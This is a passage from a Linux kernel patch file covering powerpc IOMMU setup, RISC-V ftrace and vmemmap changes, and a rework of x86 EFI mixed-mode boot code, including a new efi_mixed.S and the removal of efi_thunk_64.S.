++		iommu_table_setparms_common(tbl, pci->phb->bus->number,
++				be32_to_cpu(prop.liobn),
++				be64_to_cpu(prop.dma_base),
++				1ULL << be32_to_cpu(prop.window_shift),
++				be32_to_cpu(prop.tce_shift), NULL,
++				&iommu_table_lpar_multi_ops);
++
++		/* Only for normal boot with default window. Doesn't matter even
++		 * if we set these with DDW which is 64bit during kdump, since
++		 * these will not be used during kdump.
++		 */
++		pci->table_group->tce32_start = be64_to_cpu(prop.dma_base);
++		pci->table_group->tce32_size = 1 << be32_to_cpu(prop.window_shift);
+ 
+ 		iommu_init_table(tbl, pci->phb->node, 0, 0);
+ 		iommu_register_group(pci->table_group,
+diff --git a/arch/riscv/include/asm/ftrace.h b/arch/riscv/include/asm/ftrace.h
+index d47d87c2d7e3d..dcf1bc9de5841 100644
+--- a/arch/riscv/include/asm/ftrace.h
++++ b/arch/riscv/include/asm/ftrace.h
+@@ -25,6 +25,11 @@
+ 
+ #define ARCH_SUPPORTS_FTRACE_OPS 1
+ #ifndef __ASSEMBLY__
++
++extern void *return_address(unsigned int level);
++
++#define ftrace_return_address(n) return_address(n)
++
+ void MCOUNT_NAME(void);
+ static inline unsigned long ftrace_call_adjust(unsigned long addr)
+ {
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 59bb53da473dd..63055c6ad2c25 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -79,7 +79,7 @@
+  * Define vmemmap for pfn_to_page & page_to_pfn calls. Needed if kernel
+  * is configured with CONFIG_SPARSEMEM_VMEMMAP enabled.
+  */
+-#define vmemmap		((struct page *)VMEMMAP_START)
++#define vmemmap		((struct page *)VMEMMAP_START - (phys_ram_base >> PAGE_SHIFT))
+ 
+ #define PCI_IO_SIZE      SZ_16M
+ #define PCI_IO_END       VMEMMAP_START
+diff --git a/arch/riscv/kernel/Makefile b/arch/riscv/kernel/Makefile
+index ab333cb792fd9..4c0805d264ca8 100644
+--- a/arch/riscv/kernel/Makefile
++++ b/arch/riscv/kernel/Makefile
+@@ -7,6 +7,7 @@ ifdef CONFIG_FTRACE
+ CFLAGS_REMOVE_ftrace.o	= $(CC_FLAGS_FTRACE)
+ CFLAGS_REMOVE_patch.o	= $(CC_FLAGS_FTRACE)
+ CFLAGS_REMOVE_sbi.o	= $(CC_FLAGS_FTRACE)
++CFLAGS_REMOVE_return_address.o	= $(CC_FLAGS_FTRACE)
+ endif
+ CFLAGS_syscall_table.o	+= $(call cc-option,-Wno-override-init,)
+ CFLAGS_compat_syscall_table.o += $(call cc-option,-Wno-override-init,)
+@@ -41,6 +42,7 @@ obj-y	+= irq.o
+ obj-y	+= process.o
+ obj-y	+= ptrace.o
+ obj-y	+= reset.o
++obj-y	+= return_address.o
+ obj-y	+= setup.o
+ obj-y	+= signal.o
+ obj-y	+= syscall_table.o
+diff --git a/arch/riscv/kernel/return_address.c b/arch/riscv/kernel/return_address.c
+new file mode 100644
+index 0000000000000..c8115ec8fb304
+--- /dev/null
++++ b/arch/riscv/kernel/return_address.c
+@@ -0,0 +1,48 @@
++// SPDX-License-Identifier: GPL-2.0-only
++/*
++ * This code come from arch/arm64/kernel/return_address.c
++ *
++ * Copyright (C) 2023 SiFive.
++ */
++
++#include <linux/export.h>
++#include <linux/kprobes.h>
++#include <linux/stacktrace.h>
++
++struct return_address_data {
++	unsigned int level;
++	void *addr;
++};
++
++static bool save_return_addr(void *d, unsigned long pc)
++{
++	struct return_address_data *data = d;
++
++	if (!data->level) {
++		data->addr = (void *)pc;
++		return false;
++	}
++
++	--data->level;
++
++	return true;
++}
++NOKPROBE_SYMBOL(save_return_addr);
++
++noinline void *return_address(unsigned int level)
++{
++	struct return_address_data data;
++
++	data.level = level + 3;
++	data.addr = NULL;
++
++	arch_stack_walk(save_return_addr, &data, current, NULL);
++
++	if (!data.level)
++		return data.addr;
++	else
++		return NULL;
++
++}
++EXPORT_SYMBOL_GPL(return_address);
++NOKPROBE_SYMBOL(return_address);
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index 4c9bfc4be58d4..2f7af61b49b6c 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -1982,6 +1982,23 @@ config EFI_STUB
+ 
+ 	  See Documentation/admin-guide/efi-stub.rst for more information.
+ 
++config EFI_HANDOVER_PROTOCOL
++	bool "EFI handover protocol (DEPRECATED)"
++	depends on EFI_STUB
++	default y
++	help
++	  Select this in order to include support for the deprecated EFI
++	  handover protocol, which defines alternative entry points into the
++	  EFI stub.  This is a practice that has no basis in the UEFI
++	  specification, and requires a priori knowledge on the part of the
++	  bootloader about Linux/x86 specific ways of passing the command line
++	  and initrd, and where in memory those assets may be loaded.
++
++	  If in doubt, say Y. Even though the corresponding support is not
++	  present in upstream GRUB or other bootloaders, most distros build
++	  GRUB with numerous downstream patches applied, and may rely on the
++	  handover protocol as as result.
++
+ config EFI_MIXED
+ 	bool "EFI mixed-mode support"
+ 	depends on EFI_STUB && X86_64
+diff --git a/arch/x86/boot/compressed/Makefile b/arch/x86/boot/compressed/Makefile
+index 15b7b403a4bd0..3965b2c9efee0 100644
+--- a/arch/x86/boot/compressed/Makefile
++++ b/arch/x86/boot/compressed/Makefile
+@@ -74,6 +74,11 @@ LDFLAGS_vmlinux += -z noexecstack
+ ifeq ($(CONFIG_LD_IS_BFD),y)
+ LDFLAGS_vmlinux += $(call ld-option,--no-warn-rwx-segments)
+ endif
++ifeq ($(CONFIG_EFI_STUB),y)
++# ensure that the static EFI stub library will be pulled in, even if it is
++# never referenced explicitly from the startup code
++LDFLAGS_vmlinux += -u efi_pe_entry
++endif
+ LDFLAGS_vmlinux += -T
+ 
+ hostprogs	:= mkpiggy
+@@ -100,7 +105,7 @@ vmlinux-objs-$(CONFIG_RANDOMIZE_BASE) += $(obj)/kaslr.o
+ ifdef CONFIG_X86_64
+ 	vmlinux-objs-y += $(obj)/ident_map_64.o
+ 	vmlinux-objs-y += $(obj)/idt_64.o $(obj)/idt_handlers_64.o
+-	vmlinux-objs-y += $(obj)/mem_encrypt.o
++	vmlinux-objs-$(CONFIG_AMD_MEM_ENCRYPT) += $(obj)/mem_encrypt.o
+ 	vmlinux-objs-y += $(obj)/pgtable_64.o
+ 	vmlinux-objs-$(CONFIG_AMD_MEM_ENCRYPT) += $(obj)/sev.o
+ endif
+@@ -108,11 +113,11 @@ endif
+ vmlinux-objs-$(CONFIG_ACPI) += $(obj)/acpi.o
+ vmlinux-objs-$(CONFIG_INTEL_TDX_GUEST) += $(obj)/tdx.o $(obj)/tdcall.o
+ 
+-vmlinux-objs-$(CONFIG_EFI_MIXED) += $(obj)/efi_thunk_$(BITS).o
+ vmlinux-objs-$(CONFIG_EFI) += $(obj)/efi.o
+-efi-obj-$(CONFIG_EFI_STUB) = $(objtree)/drivers/firmware/efi/libstub/lib.a
++vmlinux-objs-$(CONFIG_EFI_MIXED) += $(obj)/efi_mixed.o
++vmlinux-objs-$(CONFIG_EFI_STUB) += $(objtree)/drivers/firmware/efi/libstub/lib.a
+ 
+-$(obj)/vmlinux: $(vmlinux-objs-y) $(efi-obj-y) FORCE
++$(obj)/vmlinux: $(vmlinux-objs-y) FORCE
+ 	$(call if_changed,ld)
+ 
+ OBJCOPYFLAGS_vmlinux.bin :=  -R .comment -S
+diff --git a/arch/x86/boot/compressed/acpi.c b/arch/x86/boot/compressed/acpi.c
+index 9caf89063e775..55c98fdd67d2b 100644
+--- a/arch/x86/boot/compressed/acpi.c
++++ b/arch/x86/boot/compressed/acpi.c
+@@ -30,13 +30,13 @@ __efi_get_rsdp_addr(unsigned long cfg_tbl_pa, unsigned int cfg_tbl_len)
+ 	 * Search EFI system tables for RSDP. Preferred is ACPI_20_TABLE_GUID to
+ 	 * ACPI_TABLE_GUID because it has more features.
+ 	 */
+-	rsdp_addr = efi_find_vendor_table(boot_params, cfg_tbl_pa, cfg_tbl_len,
++	rsdp_addr = efi_find_vendor_table(boot_params_ptr, cfg_tbl_pa, cfg_tbl_len,
+ 					  ACPI_20_TABLE_GUID);
+ 	if (rsdp_addr)
+ 		return (acpi_physical_address)rsdp_addr;
+ 
+ 	/* No ACPI_20_TABLE_GUID found, fallback to ACPI_TABLE_GUID. */
+-	rsdp_addr = efi_find_vendor_table(boot_params, cfg_tbl_pa, cfg_tbl_len,
++	rsdp_addr = efi_find_vendor_table(boot_params_ptr, cfg_tbl_pa, cfg_tbl_len,
+ 					  ACPI_TABLE_GUID);
+ 	if (rsdp_addr)
+ 		return (acpi_physical_address)rsdp_addr;
+@@ -56,15 +56,15 @@ static acpi_physical_address efi_get_rsdp_addr(void)
+ 	enum efi_type et;
+ 	int ret;
+ 
+-	et = efi_get_type(boot_params);
++	et = efi_get_type(boot_params_ptr);
+ 	if (et == EFI_TYPE_NONE)
+ 		return 0;
+ 
+-	systab_pa = efi_get_system_table(boot_params);
++	systab_pa = efi_get_system_table(boot_params_ptr);
+ 	if (!systab_pa)
+ 		error("EFI support advertised, but unable to locate system table.");
+ 
+-	ret = efi_get_conf_table(boot_params, &cfg_tbl_pa, &cfg_tbl_len);
++	ret = efi_get_conf_table(boot_params_ptr, &cfg_tbl_pa, &cfg_tbl_len);
+ 	if (ret || !cfg_tbl_pa)
+ 		error("EFI config table not found.");
+ 
+@@ -156,7 +156,7 @@ acpi_physical_address get_rsdp_addr(void)
+ {
+ 	acpi_physical_address pa;
+ 
+-	pa = boot_params->acpi_rsdp_addr;
++	pa = boot_params_ptr->acpi_rsdp_addr;
+ 
+ 	if (!pa)
+ 		pa = efi_get_rsdp_addr();
+@@ -210,7 +210,7 @@ static unsigned long get_acpi_srat_table(void)
+ 	rsdp = (struct acpi_table_rsdp *)get_cmdline_acpi_rsdp();
+ 	if (!rsdp)
+ 		rsdp = (struct acpi_table_rsdp *)(long)
+-			boot_params->acpi_rsdp_addr;
++			boot_params_ptr->acpi_rsdp_addr;
+ 
+ 	if (!rsdp)
+ 		return 0;
+diff --git a/arch/x86/boot/compressed/cmdline.c b/arch/x86/boot/compressed/cmdline.c
+index f1add5d85da9d..c1bb180973ea2 100644
+--- a/arch/x86/boot/compressed/cmdline.c
++++ b/arch/x86/boot/compressed/cmdline.c
+@@ -14,9 +14,9 @@ static inline char rdfs8(addr_t addr)
+ #include "../cmdline.c"
+ unsigned long get_cmd_line_ptr(void)
+ {
+-	unsigned long cmd_line_ptr = boot_params->hdr.cmd_line_ptr;
++	unsigned long cmd_line_ptr = boot_params_ptr->hdr.cmd_line_ptr;
+ 
+-	cmd_line_ptr |= (u64)boot_params->ext_cmd_line_ptr << 32;
++	cmd_line_ptr |= (u64)boot_params_ptr->ext_cmd_line_ptr << 32;
+ 
+ 	return cmd_line_ptr;
+ }
+diff --git a/arch/x86/boot/compressed/efi_mixed.S b/arch/x86/boot/compressed/efi_mixed.S
+new file mode 100644
+index 0000000000000..8232c5b2a9bf5
+--- /dev/null
++++ b/arch/x86/boot/compressed/efi_mixed.S
+@@ -0,0 +1,328 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Copyright (C) 2014, 2015 Intel Corporation; author Matt Fleming
++ *
++ * Early support for invoking 32-bit EFI services from a 64-bit kernel.
++ *
++ * Because this thunking occurs before ExitBootServices() we have to
++ * restore the firmware's 32-bit GDT and IDT before we make EFI service
++ * calls.
++ *
++ * On the plus side, we don't have to worry about mangling 64-bit
++ * addresses into 32-bits because we're executing with an identity
++ * mapped pagetable and haven't transitioned to 64-bit virtual addresses
++ * yet.
++ */
++
++#include <linux/linkage.h>
++#include <asm/msr.h>
++#include <asm/page_types.h>
++#include <asm/processor-flags.h>
++#include <asm/segment.h>
++
++	.code64
++	.text
++/*
++ * When booting in 64-bit mode on 32-bit EFI firmware, startup_64_mixed_mode()
++ * is the first thing that runs after switching to long mode. Depending on
++ * whether the EFI handover protocol or the compat entry point was used to
++ * enter the kernel, it will either branch to the common 64-bit EFI stub
++ * entrypoint efi_stub_entry() directly, or via the 64-bit EFI PE/COFF
++ * entrypoint efi_pe_entry(). In the former case, the bootloader must provide a
++ * struct bootparams pointer as the third argument, so the presence of such a
++ * pointer is used to disambiguate.
++ *
++ *                                                             +--------------+
++ *  +------------------+     +------------+            +------>| efi_pe_entry |
++ *  | efi32_pe_entry   |---->|            |            |       +-----------+--+
++ *  +------------------+     |            |     +------+----------------+  |
++ *                           | startup_32 |---->| startup_64_mixed_mode |  |
++ *  +------------------+     |            |     +------+----------------+  |
++ *  | efi32_stub_entry |---->|            |            |                   |
++ *  +------------------+     +------------+            |                   |
++ *                                                     V                   |
++ *                           +------------+     +----------------+         |
++ *                           | startup_64 |<----| efi_stub_entry |<--------+
++ *                           +------------+     +----------------+
++ */
++SYM_FUNC_START(startup_64_mixed_mode)
++	lea	efi32_boot_args(%rip), %rdx
++	mov	0(%rdx), %edi
++	mov	4(%rdx), %esi
++#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
++	mov	8(%rdx), %edx		// saved bootparams pointer
++	test	%edx, %edx
++	jnz	efi_stub_entry
++#endif
++	/*
++	 * efi_pe_entry uses MS calling convention, which requires 32 bytes of
++	 * shadow space on the stack even if all arguments are passed in
++	 * registers. We also need an additional 8 bytes for the space that
++	 * would be occupied by the return address, and this also results in
++	 * the correct stack alignment for entry.
++	 */
++	sub	$40, %rsp
++	mov	%rdi, %rcx		// MS calling convention
++	mov	%rsi, %rdx
++	jmp	efi_pe_entry
++SYM_FUNC_END(startup_64_mixed_mode)
++
++SYM_FUNC_START(__efi64_thunk)
++	push	%rbp
++	push	%rbx
++
++	movl	%ds, %eax
++	push	%rax
++	movl	%es, %eax
++	push	%rax
++	movl	%ss, %eax
++	push	%rax
++
++	/* Copy args passed on stack */
++	movq	0x30(%rsp), %rbp
++	movq	0x38(%rsp), %rbx
++	movq	0x40(%rsp), %rax
++
++	/*
++	 * Convert x86-64 ABI params to i386 ABI
++	 */
++	subq	$64, %rsp
++	movl	%esi, 0x0(%rsp)
++	movl	%edx, 0x4(%rsp)
++	movl	%ecx, 0x8(%rsp)
++	movl	%r8d, 0xc(%rsp)
++	movl	%r9d, 0x10(%rsp)
++	movl	%ebp, 0x14(%rsp)
++	movl	%ebx, 0x18(%rsp)
++	movl	%eax, 0x1c(%rsp)
++
++	leaq	0x20(%rsp), %rbx
++	sgdt	(%rbx)
++	sidt	16(%rbx)
++
++	leaq	1f(%rip), %rbp
++
++	/*
++	 * Switch to IDT and GDT with 32-bit segments. These are the firmware
++	 * GDT and IDT that were installed when the kernel started executing.
++	 * The pointers were saved by the efi32_entry() routine below.
++	 *
++	 * Pass the saved DS selector to the 32-bit code, and use far return to
++	 * restore the saved CS selector.
++	 */
++	lidt	efi32_boot_idt(%rip)
++	lgdt	efi32_boot_gdt(%rip)
++
++	movzwl	efi32_boot_ds(%rip), %edx
++	movzwq	efi32_boot_cs(%rip), %rax
++	pushq	%rax
++	leaq	efi_enter32(%rip), %rax
++	pushq	%rax
++	lretq
++
++1:	addq	$64, %rsp
++	movq	%rdi, %rax
++
++	pop	%rbx
++	movl	%ebx, %ss
++	pop	%rbx
++	movl	%ebx, %es
++	pop	%rbx
++	movl	%ebx, %ds
++	/* Clear out 32-bit selector from FS and GS */
++	xorl	%ebx, %ebx
++	movl	%ebx, %fs
++	movl	%ebx, %gs
++
++	/*
++	 * Convert 32-bit status code into 64-bit.
++	 */
++	roll	$1, %eax
++	rorq	$1, %rax
++
++	pop	%rbx
++	pop	%rbp
++	RET
++SYM_FUNC_END(__efi64_thunk)
++
++	.code32
++#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
++SYM_FUNC_START(efi32_stub_entry)
++	call	1f
++1:	popl	%ecx
++
++	/* Clear BSS */
++	xorl	%eax, %eax
++	leal	(_bss - 1b)(%ecx), %edi
++	leal	(_ebss - 1b)(%ecx), %ecx
++	subl	%edi, %ecx
++	shrl	$2, %ecx
++	cld
++	rep	stosl
++
++	add	$0x4, %esp		/* Discard return address */
++	popl	%ecx
++	popl	%edx
++	popl	%esi
++	jmp	efi32_entry
++SYM_FUNC_END(efi32_stub_entry)
++#endif
++
++/*
++ * EFI service pointer must be in %edi.
++ *
++ * The stack should represent the 32-bit calling convention.
++ */
++SYM_FUNC_START_LOCAL(efi_enter32)
++	/* Load firmware selector into data and stack segment registers */
++	movl	%edx, %ds
++	movl	%edx, %es
++	movl	%edx, %fs
++	movl	%edx, %gs
++	movl	%edx, %ss
++
++	/* Reload pgtables */
++	movl	%cr3, %eax
++	movl	%eax, %cr3
++
++	/* Disable paging */
++	movl	%cr0, %eax
++	btrl	$X86_CR0_PG_BIT, %eax
++	movl	%eax, %cr0
++
++	/* Disable long mode via EFER */
++	movl	$MSR_EFER, %ecx
++	rdmsr
++	btrl	$_EFER_LME, %eax
++	wrmsr
++
++	call	*%edi
++
++	/* We must preserve return value */
++	movl	%eax, %edi
++
++	/*
++	 * Some firmware will return with interrupts enabled. Be sure to
++	 * disable them before we switch GDTs and IDTs.
++	 */
++	cli
++
++	lidtl	16(%ebx)
++	lgdtl	(%ebx)
++
++	movl	%cr4, %eax
++	btsl	$(X86_CR4_PAE_BIT), %eax
++	movl	%eax, %cr4
++
++	movl	%cr3, %eax
++	movl	%eax, %cr3
++
++	movl	$MSR_EFER, %ecx
++	rdmsr
++	btsl	$_EFER_LME, %eax
++	wrmsr
++
++	xorl	%eax, %eax
++	lldt	%ax
++
++	pushl	$__KERNEL_CS
++	pushl	%ebp
++
++	/* Enable paging */
++	movl	%cr0, %eax
++	btsl	$X86_CR0_PG_BIT, %eax
++	movl	%eax, %cr0
++	lret
++SYM_FUNC_END(efi_enter32)
++
++/*
++ * This is the common EFI stub entry point for mixed mode.
++ *
++ * Arguments:	%ecx	image handle
++ * 		%edx	EFI system table pointer
++ *		%esi	struct bootparams pointer (or NULL when not using
++ *			the EFI handover protocol)
++ *
++ * Since this is the point of no return for ordinary execution, no registers
++ * are considered live except for the function parameters. [Note that the EFI
++ * stub may still exit and return to the firmware using the Exit() EFI boot
++ * service.]
++ */
++SYM_FUNC_START_LOCAL(efi32_entry)
++	call	1f
++1:	pop	%ebx
++
++	/* Save firmware GDTR and code/data selectors */
++	sgdtl	(efi32_boot_gdt - 1b)(%ebx)
++	movw	%cs, (efi32_boot_cs - 1b)(%ebx)
++	movw	%ds, (efi32_boot_ds - 1b)(%ebx)
++
++	/* Store firmware IDT descriptor */
++	sidtl	(efi32_boot_idt - 1b)(%ebx)
++
++	/* Store boot arguments */
++	leal	(efi32_boot_args - 1b)(%ebx), %ebx
++	movl	%ecx, 0(%ebx)
++	movl	%edx, 4(%ebx)
++	movl	%esi, 8(%ebx)
++	movb	$0x0, 12(%ebx)          // efi_is64
++
++	/* Disable paging */
++	movl	%cr0, %eax
++	btrl	$X86_CR0_PG_BIT, %eax
++	movl	%eax, %cr0
++
++	jmp	startup_32
++SYM_FUNC_END(efi32_entry)
++
++/*
++ * efi_status_t efi32_pe_entry(efi_handle_t image_handle,
++ *			       efi_system_table_32_t *sys_table)
++ */
++SYM_FUNC_START(efi32_pe_entry)
++	pushl	%ebp
++	movl	%esp, %ebp
++	pushl	%ebx				// save callee-save registers
++	pushl	%edi
++
++	call	verify_cpu			// check for long mode support
++	testl	%eax, %eax
++	movl	$0x80000003, %eax		// EFI_UNSUPPORTED
++	jnz	2f
++
++	movl	8(%ebp), %ecx			// image_handle
++	movl	12(%ebp), %edx			// sys_table
++	xorl	%esi, %esi
++	jmp	efi32_entry			// pass %ecx, %edx, %esi
++						// no other registers remain live
++
++2:	popl	%edi				// restore callee-save registers
++	popl	%ebx
++	leave
++	RET
++SYM_FUNC_END(efi32_pe_entry)
++
++#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
++	.org	efi32_stub_entry + 0x200
++	.code64
++SYM_FUNC_START_NOALIGN(efi64_stub_entry)
++	jmp	efi_handover_entry
++SYM_FUNC_END(efi64_stub_entry)
++#endif
++
++	.data
++	.balign	8
++SYM_DATA_START_LOCAL(efi32_boot_gdt)
++	.word	0
++	.quad	0
++SYM_DATA_END(efi32_boot_gdt)
++
++SYM_DATA_START_LOCAL(efi32_boot_idt)
++	.word	0
++	.quad	0
++SYM_DATA_END(efi32_boot_idt)
++
++SYM_DATA_LOCAL(efi32_boot_cs, .word 0)
++SYM_DATA_LOCAL(efi32_boot_ds, .word 0)
++SYM_DATA_LOCAL(efi32_boot_args, .long 0, 0, 0)
++SYM_DATA(efi_is64, .byte 1)
+diff --git a/arch/x86/boot/compressed/efi_thunk_64.S b/arch/x86/boot/compressed/efi_thunk_64.S
+deleted file mode 100644
+index 67e7edcdfea8f..0000000000000
+--- a/arch/x86/boot/compressed/efi_thunk_64.S
++++ /dev/null
+@@ -1,195 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Copyright (C) 2014, 2015 Intel Corporation; author Matt Fleming
+- *
+- * Early support for invoking 32-bit EFI services from a 64-bit kernel.
+- *
+- * Because this thunking occurs before ExitBootServices() we have to
+- * restore the firmware's 32-bit GDT and IDT before we make EFI service
+- * calls.
+- *
+- * On the plus side, we don't have to worry about mangling 64-bit
+- * addresses into 32-bits because we're executing with an identity
+- * mapped pagetable and haven't transitioned to 64-bit virtual addresses
+- * yet.
+- */
+-
+-#include <linux/linkage.h>
+-#include <asm/msr.h>
+-#include <asm/page_types.h>
+-#include <asm/processor-flags.h>
+-#include <asm/segment.h>
+-
+-	.code64
+-	.text
+-SYM_FUNC_START(__efi64_thunk)
+-	push	%rbp
+-	push	%rbx
+-
+-	movl	%ds, %eax
+-	push	%rax
+-	movl	%es, %eax
+-	push	%rax
+-	movl	%ss, %eax
+-	push	%rax
+-
+-	/* Copy args passed on stack */
+-	movq	0x30(%rsp), %rbp
+-	movq	0x38(%rsp), %rbx
+-	movq	0x40(%rsp), %rax
+-
+-	/*
+-	 * Convert x86-64 ABI params to i386 ABI
+-	 */
+-	subq	$64, %rsp
+-	movl	%esi, 0x0(%rsp)
+-	movl	%edx, 0x4(%rsp)
+-	movl	%ecx, 0x8(%rsp)
+-	movl	%r8d, 0xc(%rsp)
+-	movl	%r9d, 0x10(%rsp)
+-	movl	%ebp, 0x14(%rsp)
+-	movl	%ebx, 0x18(%rsp)
+-	movl	%eax, 0x1c(%rsp)
+-
+-	leaq	0x20(%rsp), %rbx
+-	sgdt	(%rbx)
+-
+-	addq	$16, %rbx
+-	sidt	(%rbx)
+-
+-	leaq	1f(%rip), %rbp
+-
+-	/*
+-	 * Switch to IDT and GDT with 32-bit segments. This is the firmware GDT
+-	 * and IDT that was installed when the kernel started executing. The
+-	 * pointers were saved at the EFI stub entry point in head_64.S.
+-	 *
+-	 * Pass the saved DS selector to the 32-bit code, and use far return to
+-	 * restore the saved CS selector.
+-	 */
+-	leaq	efi32_boot_idt(%rip), %rax
+-	lidt	(%rax)
+-	leaq	efi32_boot_gdt(%rip), %rax
+-	lgdt	(%rax)
+-
+-	movzwl	efi32_boot_ds(%rip), %edx
+-	movzwq	efi32_boot_cs(%rip), %rax
+-	pushq	%rax
+-	leaq	efi_enter32(%rip), %rax
+-	pushq	%rax
+-	lretq
+-
+-1:	addq	$64, %rsp
+-	movq	%rdi, %rax
+-
+-	pop	%rbx
+-	movl	%ebx, %ss
+-	pop	%rbx
+-	movl	%ebx, %es
+-	pop	%rbx
+-	movl	%ebx, %ds
+-	/* Clear out 32-bit selector from FS and GS */
+-	xorl	%ebx, %ebx
+-	movl	%ebx, %fs
+-	movl	%ebx, %gs
+-
+-	/*
+-	 * Convert 32-bit status code into 64-bit.
+-	 */
+-	roll	$1, %eax
+-	rorq	$1, %rax
+-
+-	pop	%rbx
+-	pop	%rbp
+-	RET
+-SYM_FUNC_END(__efi64_thunk)
+-
+-	.code32
+-/*
+- * EFI service pointer must be in %edi.
+- *
+- * The stack should represent the 32-bit calling convention.
+- */
+-SYM_FUNC_START_LOCAL(efi_enter32)
+-	/* Load firmware selector into data and stack segment registers */
+-	movl	%edx, %ds
+-	movl	%edx, %es
+-	movl	%edx, %fs
+-	movl	%edx, %gs
+-	movl	%edx, %ss
+-
+-	/* Reload pgtables */
+-	movl	%cr3, %eax
+-	movl	%eax, %cr3
+-
+-	/* Disable paging */
+-	movl	%cr0, %eax
+-	btrl	$X86_CR0_PG_BIT, %eax
+-	movl	%eax, %cr0
+-
+-	/* Disable long mode via EFER */
+-	movl	$MSR_EFER, %ecx
+-	rdmsr
+-	btrl	$_EFER_LME, %eax
+-	wrmsr
+-
+-	call	*%edi
+-
+-	/* We must preserve return value */
+-	movl	%eax, %edi
+-
+-	/*
+-	 * Some firmware will return with interrupts enabled. Be sure to
+-	 * disable them before we switch GDTs and IDTs.
+-	 */
+-	cli
+-
+-	lidtl	(%ebx)
+-	subl	$16, %ebx
+-
+-	lgdtl	(%ebx)
+-
+-	movl	%cr4, %eax
+-	btsl	$(X86_CR4_PAE_BIT), %eax
+-	movl	%eax, %cr4
+-
+-	movl	%cr3, %eax
+-	movl	%eax, %cr3
+-
+-	movl	$MSR_EFER, %ecx
+-	rdmsr
+-	btsl	$_EFER_LME, %eax
+-	wrmsr
+-
+-	xorl	%eax, %eax
+-	lldt	%ax
+-
+-	pushl	$__KERNEL_CS
+-	pushl	%ebp
+-
+-	/* Enable paging */
+-	movl	%cr0, %eax
+-	btsl	$X86_CR0_PG_BIT, %eax
+-	movl	%eax, %cr0
+-	lret
+-SYM_FUNC_END(efi_enter32)
+-
+-	.data
+-	.balign	8
+-SYM_DATA_START(efi32_boot_gdt)
+-	.word	0
+-	.quad	0
+-SYM_DATA_END(efi32_boot_gdt)
+-
+-SYM_DATA_START(efi32_boot_idt)
+-	.word	0
+-	.quad	0
+-SYM_DATA_END(efi32_boot_idt)
+-
+-SYM_DATA_START(efi32_boot_cs)
+-	.word	0
+-SYM_DATA_END(efi32_boot_cs)
+-
+-SYM_DATA_START(efi32_boot_ds)
+-	.word	0
+-SYM_DATA_END(efi32_boot_ds)
+diff --git a/arch/x86/boot/compressed/head_32.S b/arch/x86/boot/compressed/head_32.S
+index 3b354eb9516df..1cfe9802a42fe 100644
+--- a/arch/x86/boot/compressed/head_32.S
++++ b/arch/x86/boot/compressed/head_32.S
+@@ -84,19 +84,6 @@ SYM_FUNC_START(startup_32)
+ 
+ #ifdef CONFIG_RELOCATABLE
+ 	leal	startup_32@GOTOFF(%edx), %ebx
+-
+-#ifdef CONFIG_EFI_STUB
+-/*
+- * If we were loaded via the EFI LoadImage service, startup_32() will be at an
+- * offset to the start of the space allocated for the image. efi_pe_entry() will
+- * set up image_offset to tell us where the image actually starts, so that we
+- * can use the full available buffer.
+- *	image_offset = startup_32 - image_base
+- * Otherwise image_offset will be zero and has no effect on the calculations.
+- */
+-	subl    image_offset@GOTOFF(%edx), %ebx
+-#endif
+-
+ 	movl	BP_kernel_alignment(%esi), %eax
+ 	decl	%eax
+ 	addl    %eax, %ebx
+@@ -150,17 +137,6 @@ SYM_FUNC_START(startup_32)
+ 	jmp	*%eax
+ SYM_FUNC_END(startup_32)
+ 
+-#ifdef CONFIG_EFI_STUB
+-SYM_FUNC_START(efi32_stub_entry)
+-	add	$0x4, %esp
+-	movl	8(%esp), %esi	/* save boot_params pointer */
+-	call	efi_main
+-	/* efi_main returns the possibly relocated address of startup_32 */
+-	jmp	*%eax
+-SYM_FUNC_END(efi32_stub_entry)
+-SYM_FUNC_ALIAS(efi_stub_entry, efi32_stub_entry)
+-#endif
+-
+ 	.text
+ SYM_FUNC_START_LOCAL_NOALIGN(.Lrelocated)
+ 
+@@ -179,15 +155,9 @@ SYM_FUNC_START_LOCAL_NOALIGN(.Lrelocated)
+  */
+ 	/* push arguments for extract_kernel: */
+ 
+-	pushl	output_len@GOTOFF(%ebx)	/* decompressed length, end of relocs */
+ 	pushl	%ebp			/* output address */
+-	pushl	input_len@GOTOFF(%ebx)	/* input_len */
+-	leal	input_data@GOTOFF(%ebx), %eax
+-	pushl	%eax			/* input_data */
+-	leal	boot_heap@GOTOFF(%ebx), %eax
+-	pushl	%eax			/* heap area */
+ 	pushl	%esi			/* real mode pointer */
+-	call	extract_kernel		/* returns kernel location in %eax */
++	call	extract_kernel		/* returns kernel entry point in %eax */
+ 	addl	$24, %esp
+ 
+ /*
+@@ -208,17 +178,11 @@ SYM_DATA_START_LOCAL(gdt)
+ 	.quad	0x00cf92000000ffff	/* __KERNEL_DS */
+ SYM_DATA_END_LABEL(gdt, SYM_L_LOCAL, gdt_end)
+ 
+-#ifdef CONFIG_EFI_STUB
+-SYM_DATA(image_offset, .long 0)
+-#endif
+-
+ /*
+  * Stack and heap for uncompression
+  */
+ 	.bss
+ 	.balign 4
+-boot_heap:
+-	.fill BOOT_HEAP_SIZE, 1, 0
+ boot_stack:
+ 	.fill BOOT_STACK_SIZE, 1, 0
+ boot_stack_end:
+diff --git a/arch/x86/boot/compressed/head_64.S b/arch/x86/boot/compressed/head_64.S
+index b4bd6df29116f..0d7aef10b19ad 100644
+--- a/arch/x86/boot/compressed/head_64.S
++++ b/arch/x86/boot/compressed/head_64.S
+@@ -118,7 +118,9 @@ SYM_FUNC_START(startup_32)
+ 1:
+ 
+ 	/* Setup Exception handling for SEV-ES */
++#ifdef CONFIG_AMD_MEM_ENCRYPT
+ 	call	startup32_load_idt
++#endif
+ 
+ 	/* Make sure cpu supports long mode. */
+ 	call	verify_cpu
+@@ -136,19 +138,6 @@ SYM_FUNC_START(startup_32)
+ 
+ #ifdef CONFIG_RELOCATABLE
+ 	movl	%ebp, %ebx
+-
+-#ifdef CONFIG_EFI_STUB
+-/*
+- * If we were loaded via the EFI LoadImage service, startup_32 will be at an
+- * offset to the start of the space allocated for the image. efi_pe_entry will
